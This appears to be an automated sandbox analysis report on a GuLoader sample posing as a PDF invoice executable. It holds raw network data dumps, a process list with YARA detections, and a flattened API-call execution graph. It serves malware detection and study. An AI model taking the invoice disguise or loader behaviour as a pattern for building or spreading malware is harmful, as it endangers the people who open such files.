                                                                                                2023-03-20 10:06:11 UTC105INData Raw: 47 17 60 8e 2f 92 77 52 bf 91 26 f3 11 d9 45 af f8 ce c6 d4 ea 00 34 41 93 54 5e f2 f5 da 86 28 f1 ca 1c 23 cf 69 42 30 99 f5 5c af ec 6b 3f a4 a2 4a 33 89 4b 9a a2 44 2c d5 39 41 e7 01 cb 79 55 49 2c c3 84 d0 d8 56 05 f5 3d 55 99 a0 33 b6 53 0c b4 41 bf 25 d8 40 bc ab 57 11 af 16 d3 fc 60 0e 9a 16 94 19 da 85 dc 0f 41 b7 a3 a0 e1 af 6e c9 22 4a cd 01 7b be 54 ab 0a fb b1 84 8c 6d 77 74 43 df 3f 22 a0 1f ba 2b 20 81 8b 84 47 04 d5 c5 e9 e2 bc 7b 56 15 88 82 d0 cc 96 18 07 9f 84 2d 0c 8a e8 3e 1c b8 42 8c 2a 1f cf 1a c5 cc 35 4f 29 04 7e db 52 ba bd d1 eb 79 ef ea 55 b7 04 60 8e af 18 2d 32 e2 68 fe 38 65 0f 07 c6 84 39 f6 8b e9 c0 00 49 75 a8 22 bc d3 ef ee 61 13 24 b6 e0 6a b1 05 bd 4d 06 7d c9 d9 a1 eb 4a 18 6b b0 29 83 e7 ea 38 36 44 79 b7 09 27 5a 05
                                                                                                Data Ascii: G`/wR&E4AT^(#iB0\k?J3KD,9AyUI,V=U3SA%@W`An"J{TmwtC?"+ G{V->B*5O)~RyU`-2h8e9Iu"a$jM}Jk)86Dy'Z
                                                                                                2023-03-20 10:06:11 UTC106INData Raw: 96 e9 87 b9 81 0a 7c d5 a8 67 b2 dc 4e 06 32 1d 79 c6 97 98 8b 66 bc b1 9b e5 4b 12 f9 ac 18 d8 5f 57 66 3b c5 89 34 dd 8a dc 74 e6 b8 51 1d 85 07 31 25 6c ed 90 67 ec e0 a5 99 cd e9 3f ef 0d c5 93 10 a4 66 6f c7 f3 32 f6 bf fb 8c f5 44 8b 7a 97 61 1a 5f c8 fc bb e5 f4 e0 60 14 cd 01 b6 61 f3 b2 0f 3a 41 e8 86 86 df 30 40 52 15 a5 0f 39 52 34 ff dc 9a 7b b5 d6 9c 13 3c 04 7a 03 2e 4d 78 4e 1b 2f 1f db 82 a4 ff 48 55 23 fa c5 c0 5e 5f 09 1b c0 e9 f9 3f f2 4a 42 02 09 c4 48 b6 a7 de ab e5 54 c9 c2 2e e2 07 4a 11 6d 85 b2 ef cf b0 65 98 cb e4 4a 64 6c af d1 48 53 85 3e 97 b9 4a 86 41 41 aa 51 f9 a9 07 f7 0d 85 bf ae 38 d7 49 49 c1 ac 23 c9 58 85 4a bc 41 f9 3f 81 0c 64 4d 69 cb 5d 36 ef e9 c2 b1 5f 47 df 0b 1b 6b 70 07 df 85 d0 58 19 63 10 e5 cb 48 be 18 14
                                                                                                Data Ascii: |gN2yfK_Wf;4tQ1%lg?fo2Dza_`a:A0@R9R4{<z.MxN/HU#^_?JBHT.JmeJdlHS>JAAQ8II#XJA?dMi]6_GkpXcH
                                                                                                2023-03-20 10:06:11 UTC107INData Raw: 03 24 90 85 2e ee b3 97 79 ca 39 78 81 0b 29 bf 8c 08 b9 7a fb 90 f9 05 48 34 c3 35 d8 c2 27 7e a3 36 22 f7 b8 43 38 e8 0f 03 c9 a8 2a d4 7c 91 b8 7e b3 ea 6f e4 c0 54 f7 1c f2 b9 40 59 85 a0 38 b9 b6 7e 68 6c 54 5e 21 ba ec 84 04 cc bf cb 3b 2f 11 dc d2 23 8d 19 68 49 5b 3a 94 48 0b f3 4f 0f de 3e 60 f3 dc 38 4e 94 24 60 40 c9 3d 7a 4c fc dd 2e ea e0 e4 5c c8 d6 d6 49 e7 ab f5 5b 37 6e e1 76 84 b7 43 25 2b 25 71 21 94 c9 97 05 fc ae 1c 28 be f0 9c 9e 89 d8 6a 7c c1 59 12 ef 3e e1 5f 80 ce 63 4a fe e7 90 d0 fe 2c 2c 22 97 7c 60 41 0d 19 47 27 60 d8 2f 8f 77 02 bf bc 4b 9c 11 b7 45 f0 f8 9a c6 89 ea 59 34 42 93 3b 5e 9c f5 85 86 7c f1 97 1c 7a cf 03 42 78 99 ac 5c d2 ec 34 3f e6 a2 17 33 c1 4b c5 a2 1d 2c 81 39 44 e7 05 cb 74 55 02 2c 8f 84 94 d8 17 05 bd
                                                                                                Data Ascii: $.y9x)zH45'~6"C8*|~oT@Y8~hlT^!;/#hI[:HO>`8N$`@=zL.\I[7nvC%+%q!(j|Y>_cJ,,"|`AG'`/wKEY4B;^|zBx\4?3K,9DtU,
                                                                                                2023-03-20 10:06:11 UTC108INData Raw: 35 3a 29 5f 7e 84 52 ca 3d 02 b8 16 80 8b 33 c5 70 04 f9 8f 79 61 40 8d 0d 99 64 16 42 27 af cd 5a b2 f9 c9 af 2d 3a 55 c7 23 d3 80 9b ba 3d 5c 6b e4 86 6a c2 25 d4 1d 65 1e ac f9 fd a5 7b 79 5d dd 07 e6 d7 d0 64 16 0b 79 e3 29 53 26 69 39 d8 ce dd db ff 8e 03 6b 66 fa 94 df 71 0c c3 86 1a 4e c7 37 f2 68 93 00 1b dd c4 eb 4d 35 9a ca 0d ca 12 67 43 e5 f0 d5 e7 a3 ca cd 34 5d 0e 3e ce d1 6c c5 b7 9b 40 c4 f3 c6 00 64 28 dd 13 27 4b 92 a1 09 76 d6 17 c7 d5 02 b8 55 32 54 58 5a 5d 9e b1 0e 0c 67 4b b8 e4 c0 65 42 83 94 78 38 98 87 bb 61 a5 96 f3 87 a2 81 27 77 bd a8 27 b2 90 4e 42 32 5c 79 eb 86 f2 8b 2e bc e8 9b 8a 4b 46 f9 f5 18 90 5f 09 66 16 d2 f7 34 bd 8a a5 74 9b b8 5c 1d fb 07 79 25 33 ed cb 67 a4 e0 fa 99 e0 e6 5c ef 4f c5 ca 10 e1 66 2b c7 b0 32 bc
                                                                                                Data Ascii: 5:)_~R=3pya@dB'Z-:U#=\kj%e{y]dy)S&i9kfqN7hM5gC4]>l@d('KvU2TXZ]gKeBx8a'w'NB2\y.KF_f4t\y%3g\Of+2
                                                                                                2023-03-20 10:06:11 UTC110INData Raw: e2 c2 45 95 98 ee 24 69 0d a5 ba 18 36 d2 1e b7 ed 36 f4 61 20 aa 3d aa c2 69 92 6c f7 d4 8e 5d fa 19 64 96 81 23 ed 76 a8 26 91 25 d4 5d ac 0c 60 22 63 a0 1b 53 80 87 b7 b1 26 17 bb 79 3b 04 36 73 ad e0 bf 3b 74 17 2a b1 eb 3a ed 6d 64 d7 3f b0 0f 5e 94 9e fa 84 39 96 bb d1 8d d9 14 2e b6 2e d5 cd 53 99 d3 cd 55 ea 3f b6 91 95 e9 fc 09 f6 06 17 24 e3 13 48 35 59 0b f0 ef bf d8 c3 d7 80 7d 6d a6 6e ab ac 16 3e 7b 8c 6d 43 8a ef f0 a0 8d 88 62 e7 8d 43 6e 6d 37 05 7b 15 5d 8c c8 12 75 07 d9 ec 13 f8 f7 14 78 2a 13 e7 09 82 2b e7 35 e2 36 03 71 90 8d 2e eb b3 de 79 e0 39 6f 81 00 29 f2 8c 45 b9 33 fb a2 f9 0c 48 78 c3 2d d8 d9 27 71 a3 4f 22 88 b8 78 38 a7 0f 13 c9 b3 2a 8a 7c d4 b8 45 fe cd 6f 87 c0 48 f7 70 72 5b 02 34 c6 f7 4a dc cf 1c 18 30 20 0b 0f c9
                                                                                                Data Ascii: E$i66a =il]d#v&%]`"cS&y;6s;t*:md?^9..SU?$H5Y}mn>{mCbCnm7{]ux*+56q.y9o)E3Hx-'qO"x8*|EoHpr[4J0
                                                                                                2023-03-20 10:06:11 UTC111INData Raw: 13 04 25 2d 7c 01 1d 12 a3 40 bf 1a 7f 85 bc 06 de 26 f4 16 82 8c e3 a7 f9 98 2d 39 6c 99 79 16 df 9a f7 f5 05 85 e7 26 0e ef 44 43 12 d8 d8 0c 82 bc 46 7b 89 e3 67 67 a4 0a b7 a2 e9 a3 a4 39 2a e7 49 cb 3a 55 16 2c 87 84 8f d8 5b 05 91 3d 16 99 ee 33 c7 53 72 b4 00 bf 6d d8 04 bc f6 57 52 af 52 d3 a3 60 16 9a 67 94 47 da e1 df 55 41 c3 a4 f5 e1 ef 6e 90 22 16 c4 04 7b a5 54 bb 0a fe b1 e8 81 34 77 6f 43 f7 3f 15 a0 07 ba 67 20 ee 84 cc 47 2b d5 e4 e9 df bc 69 56 2a 88 c3 d0 bb 9b 3e 07 9f 84 14 0c af e8 2f 1c bb 42 ed 05 4a cf 5b c5 98 35 50 29 24 7e dd 52 ad bd da eb 78 ef ab 55 81 04 65 8e fb 18 00 32 8d 17 94 38 1c 0f 0a c6 e0 39 9f 8b e4 c0 00 49 78 a8 0e b5 ad ef 9a 61 0f 24 8a e0 0b a4 4e bd 78 06 3e c9 ad a1 d7 4a 18 6b be 29 8d e7 b5 38 64 44 59
                                                                                                Data Ascii: %-|@&-9ly&DCF{gg9*I:U,[=3SrmWRR`gGUAn"{T4woC?g G+iV*>/BJ[5P)$~RxUe289Ixa$Nx>Jk)8dDY
                                                                                                2023-03-20 10:06:11 UTC112INData Raw: ab 87 e2 61 e4 96 b7 87 f1 81 55 7c a4 a8 1f b2 82 4e 4e 32 42 79 cb 97 f1 8b 2a bc e8 9b a9 4b 63 f9 c5 18 90 5f 1c 66 77 c5 d1 34 9c 8a 85 74 97 b8 30 1d c7 07 7b 25 28 ed d3 67 e1 e0 cc 99 81 e9 66 ef 41 c5 be 6b 84 66 48 c7 f3 32 f6 bf fb 8c d9 61 86 7a 97 61 17 5f b5 fc fa e5 d4 e0 7d 14 db 01 b2 61 e4 b2 4b 3a 66 e8 d4 86 f7 30 67 52 5e a5 47 39 00 34 de cf e7 7b f9 d6 c2 13 62 04 20 03 6c 4d 27 4e 52 2f 61 db 88 ad ec 48 49 23 ea c5 dc 5e 3b 3a 1b c0 d3 f9 6d f2 76 42 01 09 9f 48 fd a7 f8 ab aa 54 fe c2 1f e2 09 4a 11 6d e3 b2 80 cf 8a 65 fa cb 9d 4a 1d 6c 9f d1 38 53 d3 67 eb b9 43 86 22 41 c5 5e d0 a9 24 f7 09 85 b0 ae 34 d7 78 49 ca ac 76 c0 04 85 47 bc 4b f9 01 81 59 6d 51 69 c5 5d 21 ef a7 c2 f5 48 76 df 0d 1b 65 70 2f df a4 d0 5e 19 71 10 d0
                                                                                                Data Ascii: aU|NN2By*Kc_fw4t0{%(gfAkfH2aza_}aK:f0gR^G94{b lM'NR/aHI#^;:mvBHTJmeJl8SgC"A^$4xIvGKYmQi]!Hvep/^q
                                                                                                2023-03-20 10:06:11 UTC113INData Raw: 65 e7 12 e2 2d 03 65 90 bf 2e cb b3 9b 79 c0 39 7c 81 1a 29 f3 8c 0b b9 4f fb a8 f9 02 48 73 c3 2f d8 d8 27 3f a3 06 22 e3 b8 44 38 a9 0f 60 b4 ca 2a ba 7c d9 b8 69 b3 bc 6f f9 c0 04 f7 31 72 17 02 74 c6 80 4a ea cf 10 18 0d 20 35 0f df ae a4 47 98 cd b9 42 4e 61 bf a6 48 ca 7c 0d 3b 2f 1a c4 65 79 de 20 22 ae 13 05 de ae
                                                                                                Data Ascii: e-e.y9|)OHs/'?"D8`*|io1rtJ 5GBNaH|;/ey "
                                                                                                2023-03-20 10:06:11 UTC113INData Raw: 15 3a b9 5d 4d 68 c4 14 70 6c ba f5 41 8d 95 81 32 bc b2 f6 69 94 ed 9c 29 4d 01 84 1b ad 8d 63 05 4d 73 10 48 fd bf fb 64 99 c2 78 4c 9e 99 eb 93 e0 d2 1e 34 a9 36 32 9c 4d 95 2b ba af 43 3e ff df cc a3 bd 0c 44 41 e5 13 0f 25 60 7c 2e 1d 15 a3 42 bf 2b 7f ea bc 55 de 74 f4 37 82 d8 e3 82 f9 8b 2d 40 6c f2 79 02 df b1 f7 e3 05 97 e7 7d 0e ba 44 2e 1d ed d8 00 82 a0 46 50 89 c5 67 5a a4 25 b7 82 69 68 f8 58 6c 93 2c aa 54 55 13 21 ee 8e fd f5 7b 28 d8 10 78 b4 8d 1e 9b 7e 21 99 6c 92 08 f8 6d ef 86 39 3c ce 3b b8 d1 05 23 ba 3b c0 34 a8 84 be 21 22 b7 cf 9c 84 81 1c f7 02 4a e9 69 56 ca 79 df 27 8b 9c 84 ac 51 5a 1c 6e ab 32 56 aa 6f fc 15 4f 81 f1 a1 29 42 b1 91 c9 b2 fa 3f 24 43 e7 a6 bd cc a1 5b 27 ed cd 48 7e eb 87 4a 72 dd 4f 8c 0f 3f 87 37 aa ec 46
                                                                                                Data Ascii: :]MhplA2i)McMsHdxL462M+C>DA%`|.B+Ut7-@ly}D.FPgZ%ihXl,TU!{(x~!lm9<;#;4!"JiVy'QZn2VoO)B?$C['H~JrO?7F
                                                                                                2023-03-20 10:06:11 UTC115INData Raw: 5c 47 91 8b 84 38 52 ee a3 61 a4 7d 47 2c a1 9b b4 bb d7 f3 ac 07 5d b9 bf f6 d1 25 c5 dc 9b 2b c4 ee c6 19 64 34 dd 0d 27 57 92 bd 09 67 d6 20 c7 88 02 9b 55 61 54 05 5a 3c 9e d5 0e 4e 67 1b b8 b7 c0 3a 42 a4 94 38 38 f9 87 a0 61 be 96 e9 87 b9 81 0a 7c d5 a8 67 b2 dc 4e 26 32 3a 79 ad 97 da 8b 3e bc f2 9b ac 4b 1f f9 c7 18 87 5f 15 66 7b c5 9e 34 d0 8a a2 74 be b8 0c 1d cd 07 6e 25 23 ed d4 67 b3 e0 ec 99 ed e9 18 ef 68 c5 d1 10 fa 66 36 c7 e4 32 fb bf d7 ed a8 61 98 7a 8c 61 0a 5f da fc a8 e5 e8 e0 64 14 c9 01 bc 61 f3 b2 37 3a 70 e8 d4 86 f9 30 73 52 46 a5 47 39 00 34 a2 cf 9f 7b a7 d6 8a 13 3d 04 2d 03 05 4d 6b 4e 0b 2f 0d db de ad ee 48 43 23 f9 c5 d3 5e 2a 3a 57 c0 e1 f9 43 f2 55 42 03 09 c2 48 b4 a7 d5 ab e5 54 d9 c2 3d e2 12 4a 13 6d ee c7 87 cf
                                                                                                Data Ascii: \G8Ra}G,]%+d4'Wg UaTZ<Ng:B88a|gN&2:y>K_f{4tn%#ghf62aza_da7:p0sRFG94{=-MkN/HC#^*:WCUBHT=Jm
                                                                                                2023-03-20 10:06:11 UTC116INData Raw: cd 55 ea 6d cd f2 95 82 fc 4f f6 4e 17 29 e3 6a 48 6a 59 47 f0 a1 bf 9e c3 92 80 5c 6d e8 6e e7 ac 50 3e 33 8c 60 43 f3 ef af a0 c1 88 2c e7 eb 43 01 6d 03 05 34 15 05 8c 8b 12 3c 07 d4 ec 78 f8 a8 14 3a 2a 53 e7 3e 82 01 e7 26 e2 1a 03 09 90 e9 2e c7 b3 91 79 d5 39 69 81 55 29 bf 8c 7e fe 4f fb a6 f9 01 48 7d c3 35 d8 dd 27 43 a3 17 22 f1 b8 55 38 ba 0f 40 c9 83 2a d1 7c 80 b8 25 b3 cd 6f 90 c0 4c f7 7a 72 5b 02 2c c6 cc 4a cd cf 22 18 20 20 31 0f dd ae ed 47 a2 cd eb 42 6b 61 bd a6 57 ca 78 0d 49 56 37 c4 42 79 de 20 22 ae 13 05 de ae 15 3a b9 5d 4d 68 e4 14 5a 6c af f5 40 8d 81 81 37 bc b3 f6 69 94 ff 9c 29 4d 0f 84 15 ad dc 63 40 4d 57 10 01 fd e4 fb 28 99 83 78 05 9e dd eb b3 e0 f5 1e 51 a9 54 32 e5 4d a7 2b ef af 16 3e 90 92 f4 a3 de 0c 6a 41 e5 13
                                                                                                Data Ascii: UmON)jHjYG\mnP>3`C,Cm4<x:*S>&.y9iU)~OH}5'C"U8@*|%oLzr[,J" 1GBkaWxIV7By ":]MhZl@7i)Mc@MW(xQT2M+>jA
                                                                                                2023-03-20 10:06:11 UTC117INData Raw: 9a 6f 94 46 da e5 df 42 41 dc a4 f9 e1 f3 6e d7 22 67 c4 44 7b e7 54 f2 0a a6 b1 a9 81 7c 77 31 43 a6 3f 5c a0 29 ba 7a 20 f4 84 cf 47 26 d5 b1 e9 f4 bc 4d 56 2c 88 cb d0 f6 9b 7b 07 a6 84 27 0c 86 e8 2f 1c a9 42 ed 05 32 cf 3d c5 a4 35 63 29 1b 7e c6 52 f0 bd 93 eb 17 aa d7 55 9d 04 74 8e e0 18 0c 32 d1 68 cc 38 65 0f 42 c6 bf 39 92 8b 8d c0 4c 49 21 a8 42 b5 dc ef fe 61 39 24 82 e0 0b a4 50 bd 71 06 6a c9 a5 a1 e9 4a 16 6b ba 29 8f e7 be 38 36 44 3d 96 48 27 52 05 58 b7 ce c5 d6 94 84 5f 46 36 d7 e6 f2 1e 21 a5 ab 73 63 ab 1a 97 45 e0 20 47 8e 8b 85 38 54 ee a1 61 af 7d 47 2c b1 9b a7 bb c2 f3 ae 07 36 39 5b fb a3 2f e5 f1 b6 06 e9 c3 eb 34 49 19 f0 20 0a 7a bf 90 24 47 db 73 cd e6 44 fa 3a 0a 21 60 34 1c fa 81 2e 3c 21 7a ca d4 af 51 2f c1 ae 4a 18 d9
                                                                                                Data Ascii: oFBAn"gD{T|w1C?\)z G&MV,{'/B2=5c)~RUt2h8eB9LI!Ba9$PqjJk)86D=H'RX_F6!scE G8Ta}G,69[/4I z$GsD:!`4.<!zQ/J
                                                                                                2023-03-20 10:06:11 UTC118INData Raw: b2 30 3a 49 e8 fb 86 eb 30 58 52 49 a5 05 39 49 34 c4 cf e6 7b e8 d6 d1 13 60 04 32 03 6a 4d 37 4e 7e 16 30 db c4 ad c3 48 4a 23 fa c5 e8 5e 36 3a 57 c0 f9 f9 7e f2 45 42 1e 09 c0 48 be a7 de ab ab 54 e9 c2 2f e2 03 4a 00 6d 98 b2 ef cf b0 65 e6 cb c0 4a 11 6c c8 d1 74 53 d2 37 ff b9 59 86 12 41 de 5e aa a0 39 f7 0d 85 a7 ae 2e d7 19 40 c6 ac 4c c0 04 85 52 bc 25 8c 50 81 06 6d 0f 69 8d 5d 7e ef aa c2 9c 48 3a df 54 1b 29 70 53 df b3 d0 55 19 76 10 da cb 5f be 4d 14 83 4a c2 7b 3f fa fd 93 ef 52 f3 b6 a3 87 f9 5c 03 d9 03 a6 e0 27 b4 e9 e0 75 c7 3e e0 9c b8 e3 f1 24 fc 2b 51 09 8c 3e 3d 18 37 26 94 c2 9f f5 85 f7 f2 2e 02 c8 03 ca 96 7d 1e 1e ca 4d 2a de 83 82 c5 ec d2 01 8e e6 2f 0b 01 45 64 5b 18 70 86 e5 13 55 4f f4 83 3e 8b da 60 55 10 3e c7 04 82 38
                                                                                                Data Ascii: 0:I0XRI9I4{`2jM7N~0HJ#^6:W~EBHT/JmeJltS7YA^9.@LR%Pmi]~H:T)pSUv_MJ{?R\'u>$+Q>=7&.}M*/Ed[pUO>`U>8
                                                                                                2023-03-20 10:06:11 UTC120INData Raw: ec 3e 46 f3 ea 38 7c 94 1a 60 20 c9 5e 7a 27 fc b8 2e dd e0 d0 5c ee d6 a2 49 c2 ab cb 5b 15 6e dd 76 9f b7 50 25 79 25 26 21 ca c9 c3 05 a0 ae 78 2b b3 f0 ea dd a1 d8 72 7c c5 59 12 ef 18 e1 58 80 ca 63 4c fe b2 90 f3 fe 7e 2c 2e 97 75 60 4c 0d 10 47 78 60 83 2f 95 77 5f bf 86 26 fe 11 dc 45 bd f8 df c6 98 ea 4b 34 18 93 1c 5e ad f5 c9 86 2b f1 cd 1c 27 cf 44 49 7c 99 be 5c f6 ec 23 3f fb a2 67 2c df 4b 87 a2 14 2c 83 39 5d e7 51 cb 2f 55 56 2c 93 84 86 d8 48 05 a5 3d 03 99 b9 33 e6 53 21 f3 61 bf 02 d8 40 bc ab 57 11 af 16 d3 fc 60 0e 9a 16 94 19 da a4 df 72 41 d9 a4 fd e1 ea 6e 92 22 6a c4 3d 7b b8 54 be 0a e8 b1 ef 81 34 77 6e 43 8b 3f 7b a0 42 ba 38 20 ac 84 8c 47 6f d5 bc e9 9f bc 32 56 49 88 a7 e9 8a 9b 34 07 98 84 26 0c 8f e8 6a 1c 9b 42 fe 05 50
                                                                                                Data Ascii: >F8|` ^z'.\I[nvP%y%&!x+r|YXcL~,.u`LGx`/w_&EK4^+'DI|\#?g,K,9]Q/UV,H=3S!a@W`rAn"j={T4wnC?{B8 Go2VI4&jBP
                                                                                                2023-03-20 10:06:11 UTC121INData Raw: d9 37 f5 68 89 00 35 dd ef eb 64 35 be ca 13 ca 12 67 4a e5 f2 d5 d7 a3 96 cd 74 5d 65 3e fb 51 aa c8 f1 91 06 e9 c3 eb 34 49 19 f0 20 0a 7a bf 90 24 47 fb 73 e7 e6 51 fa 3b 0a 35 60 31 1c fb 81 2e 3c 33 7a ca d4 a1 51 21 c1 ff 4a 5d d9 f5 8d 41 93 bb c4 aa 94 ac 27 51 f8 85 4a 9f f1 63 2b 1f 30 74 eb 9d b5 cd 4b d3 9c ee c8 25 3f 9d 81 38 f5 19 7a 14 16 aa a4 59 f0 b0 f1 54 cb ec 7c 75 a8 72 1c 4b 41 89 bd 02 c1 92 88 fb e0 80 12 9d 20 a1 be 1d 89 6c 42 8f de 5d db cc d6 f8 f4 5b ab 5a ba 60 0f 12 98 93 da 9f 87 89 13 78 ba 6d d9 00 81 ee 6b 69 32 8d a6 e7 96 7d 04 3d 35 cb 22 52 72 51 fe b6 ca 27 d4 86 ef 61 4f 6b 0d 65 41 24 0a 22 7f 4a 6c a8 82 ad 2a c9 2b 23 95 c5 9f 5e 72 3a 16 c0 b8 f9 32 f2 34 42 41 09 88 48 fd a7 e8 ab ab 54 fc c2 37 e2 03 4a 52
                                                                                                Data Ascii: 7h5d5gJt]e>Q4I z$GsQ;5`1.<3zQ!J]A'QJc+0tK%?8zYT|urKA lB][Z`xmki2}=5"RrQ'aOkeA$"Jl*+#^r:24BAHT7JR



                                                                                                Target ID:0
                                                                                                Start time:11:05:09
                                                                                                Start date:20/03/2023
                                                                                                Path:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                Imagebase:0x400000
                                                                                                File size:431872 bytes
                                                                                                MD5 hash:A6EF5ED777BA7369C2BB28E46B198BA6
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1415606595.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1415606595.0000000005E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                Target ID:11
                                                                                                Start time:11:06:03
                                                                                                Start date:20/03/2023
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                Imagebase:0xbe0000
                                                                                                File size:108664 bytes
                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.1786467995.0000000000FC0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high

                                                                                                Target ID:12
                                                                                                Start time:11:06:03
                                                                                                Start date:20/03/2023
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff64d8d0000
                                                                                                File size:875008 bytes
                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:15
                                                                                                Start time:11:06:18
                                                                                                Start date:20/03/2023
                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 2500
                                                                                                Imagebase:0xab0000
                                                                                                File size:482640 bytes
                                                                                                MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Reputation:moderate


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:20.2%
                                                                                                  Dynamic/Decrypted Code Coverage:13.5%
                                                                                                  Signature Coverage:19.6%
                                                                                                  Total number of Nodes:1554
                                                                                                  Total number of Limit Nodes:40
API calls 5634->5635 5636 401cf3 IsWindow 5635->5636 5637 401a20 5636->5637 4781 40176f 4782 402c37 17 API calls 4781->4782 4783 401776 4782->4783 4784 401796 4783->4784 4785 40179e 4783->4785 4840 40625f lstrcpynW 4784->4840 4841 40625f lstrcpynW 4785->4841 4788 4017a9 4790 405b30 3 API calls 4788->4790 4789 40179c 4792 4064f3 5 API calls 4789->4792 4791 4017af lstrcatW 4790->4791 4791->4789 4809 4017bb 4792->4809 4793 4065a2 2 API calls 4793->4809 4794 405d2c 2 API calls 4794->4809 4796 4017cd CompareFileTime 4796->4809 4797 40188d 4799 4052c3 24 API calls 4797->4799 4798 401864 4800 4052c3 24 API calls 4798->4800 4808 401879 4798->4808 4801 401897 4799->4801 4800->4808 4820 4030fa 4801->4820 4803 40625f lstrcpynW 4803->4809 4805 4018be SetFileTime 4807 4018d0 CloseHandle 4805->4807 4806 406281 17 API calls 4806->4809 4807->4808 4810 4018e1 4807->4810 4809->4793 4809->4794 4809->4796 4809->4797 4809->4798 4809->4803 4809->4806 4819 405d51 GetFileAttributesW CreateFileW 4809->4819 4842 4058c1 4809->4842 4811 4018e6 4810->4811 4812 4018f9 4810->4812 4814 406281 17 API calls 4811->4814 4813 406281 17 API calls 4812->4813 4816 401901 4813->4816 4815 4018ee lstrcatW 4814->4815 4815->4816 4816->4808 4818 4058c1 MessageBoxIndirectW 4816->4818 4818->4808 4819->4809 4822 403113 4820->4822 4821 403141 4846 4032f2 4821->4846 4822->4821 4849 403308 SetFilePointer 4822->4849 4826 4018aa 4826->4805 4826->4807 4827 40328b 4829 4032cd 4827->4829 4834 40328f 4827->4834 4828 40315e GetTickCount 4828->4826 4832 40318a 4828->4832 4830 4032f2 ReadFile 4829->4830 4830->4826 4831 4032f2 ReadFile 4831->4832 4832->4826 4832->4831 4836 4031e0 GetTickCount 4832->4836 4837 403205 MulDiv wsprintfW 4832->4837 4839 405e03 WriteFile 4832->4839 4833 4032f2 ReadFile 4833->4834 4834->4826 4834->4833 4835 405e03 WriteFile 4834->4835 4835->4834 4836->4832 4838 4052c3 24 API calls 4837->4838 4838->4832 4839->4832 4840->4789 4841->4788 4843 4058d6 4842->4843 4844 405922 4843->4844 4845 4058ea 
MessageBoxIndirectW 4843->4845 4844->4809 4845->4844 4847 405dd4 ReadFile 4846->4847 4848 40314c 4847->4848 4848->4826 4848->4827 4848->4828 4849->4821 5789 402570 5790 402c37 17 API calls 5789->5790 5791 402577 5790->5791 5794 405d51 GetFileAttributesW CreateFileW 5791->5794 5793 402583 5794->5793 5090 401b71 5091 401bc2 5090->5091 5097 401b7e 5090->5097 5093 401bc7 5091->5093 5094 401bec GlobalAlloc 5091->5094 5092 401c07 5096 406281 17 API calls 5092->5096 5103 4022f1 5092->5103 5093->5103 5111 40625f lstrcpynW 5093->5111 5095 406281 17 API calls 5094->5095 5095->5092 5099 4022eb 5096->5099 5097->5092 5100 401b95 5097->5100 5099->5103 5104 4058c1 MessageBoxIndirectW 5099->5104 5109 40625f lstrcpynW 5100->5109 5101 401bd9 GlobalFree 5101->5103 5104->5103 5105 401ba4 5110 40625f lstrcpynW 5105->5110 5107 401bb3 5112 40625f lstrcpynW 5107->5112 5109->5105 5110->5107 5111->5101 5112->5103 5113 4024f2 5114 402c77 17 API calls 5113->5114 5115 4024fc 5114->5115 5116 402c15 17 API calls 5115->5116 5117 402505 5116->5117 5118 402885 5117->5118 5119 402521 RegEnumKeyW 5117->5119 5120 40252d RegEnumValueW 5117->5120 5122 402549 RegCloseKey 5119->5122 5121 402542 5120->5121 5120->5122 5121->5122 5122->5118 5297 401a72 5298 402c15 17 API calls 5297->5298 5299 401a78 5298->5299 5300 402c15 17 API calls 5299->5300 5301 401a20 5300->5301 5124 401573 5125 401583 ShowWindow 5124->5125 5126 40158c 5124->5126 5125->5126 5127 40159a ShowWindow 5126->5127 5128 402abf 5126->5128 5127->5128 5638 4014f5 SetForegroundWindow 5639 402abf 5638->5639 5640 100016b6 5641 100016e5 5640->5641 5642 10001b18 22 API calls 5641->5642 5643 100016ec 5642->5643 5644 100016f3 5643->5644 5645 100016ff 5643->5645 5646 10001272 2 API calls 5644->5646 5647 10001726 5645->5647 5648 10001709 5645->5648 5649 100016fd 5646->5649 5651 10001750 5647->5651 5652 1000172c 5647->5652 5650 1000153d 3 API calls 5648->5650 5655 1000170e 5650->5655 5654 1000153d 3 API calls 5651->5654 5653 100015b4 3 API calls 5652->5653 
